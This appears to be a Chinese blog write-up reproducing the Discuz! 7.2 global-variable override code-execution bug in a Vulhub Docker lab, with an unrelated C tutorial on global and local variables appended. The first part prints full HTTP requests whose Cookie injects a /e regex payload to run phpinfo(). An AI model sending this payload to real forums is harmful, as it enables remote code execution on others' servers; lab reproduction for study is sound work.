由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致$_REQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。

具体原理请参考：

• Discuz! 6.x/7.x 全局变量防御绕过导致命令执行 - SecPulse.COM | 安全脉搏

产品样子

 直接找一个已存在的帖子，向其发送数据包，并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

发送数据包

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: 192.168.1.53:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.53:8080/forumdisplay.php?fid=2
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

0x01 分析

由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致${}_{R}EQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。

具体原理请参考：

https://www.secpulse.com/archives/2338.html

0x02 环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101

0x03 启动环境

1、执行如下命令启动Discuz 7.2：

cd vulhub-master/discuz/wooyun-2010-080723/
sudo docker-compose up -d

sudo docker ps

已经启动

2、安装discuz

启动后，访问http://your-ip:8080/install/来安装discuz，数据库地址填写db，数据库名为discuz，数据库账号密码均为root。

0x04 漏洞复现

安装成功后，直接找一个已存在的帖子，向其发送数据包，并在Cookie中增加

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();：

GET /viewthread.php?tid=7&extra=page%3D1 HTTP/1.1
Host: 192.168.91.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.91.130:8080/forumdisplay.php?fid=2
Connection: close
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

可见，phpinfo已成功执行：

网上文章说需要一个带表情评论的帖子，实际测试发现并不需要，这块仍需阅读代码来解释原因。

C语言之全局变量

1、在函数里面定义的变量称为局部变量，在函数外面定义的变量称为外部变量，也称为全局变量。
2、若在函数的内部存在一个与全局变量同名的局部变量，南无编译器不会报错，而是用局部变量来覆盖（替换）全局变量，即：全局变量不起作用。

代码示例1：全局变量在所有局部函数里面均适用。

[liangjian@localhost ~]$ cat test6.c 
#include <stdio.h>
void a (void);
void b(void); //函数的声明；
void c (void);

int count = 0;

void  a (void)   //函数的定义；
{
	count++;
}

void  b (void)
{
	count++ ;
}

void c (void)
{
	count ++;   //定义；
}

void main(void)
{
	a ();  //函数的调用；
	b ();
	c ();
	a ();
	c ();	
	printf("jj被夸了%d次！\n",count);
	return;
}
[liangjian@localhost ~]$ gcc test6.c &&./a.out     //函数执行
jj被夸了5次！

代码示例2：局部变量和全局变量同名，局部变量覆盖全局变量。

[liangjian@localhost ~]$ cat test7.c 
#include <stdio.h>
void func (void);   //声明func；
int a,b = 520;    //定义全剧变量，a没有赋予初值，默认初始化为0，b赋值为520；
void func ()   //定义函数func
{
	a= 880;    //a不是在func里面定义的变量，此处把880赋值给a；
	int b;    //定义一个和全局变量同名的局部变量b，并赋值为120，调用func函数时，局部的b 120会覆盖全局的b 520 ；
	b= 120;
	printf("In func:%d %d\n",a,b);
}

int main (void)
{
	printf("In main:%d %d\n",a,b);

	func ();     //调用函数func，a=880，b覆盖全局，变为120 ；

	printf("In main:%d %d \n",a,b);
	
	return 0;
}
[liangjian@localhost ~]$ gcc test7.c &&./a.out 
In main:0 520
In func:880 120
In main:880 520 
[liangjian@localhost ~]$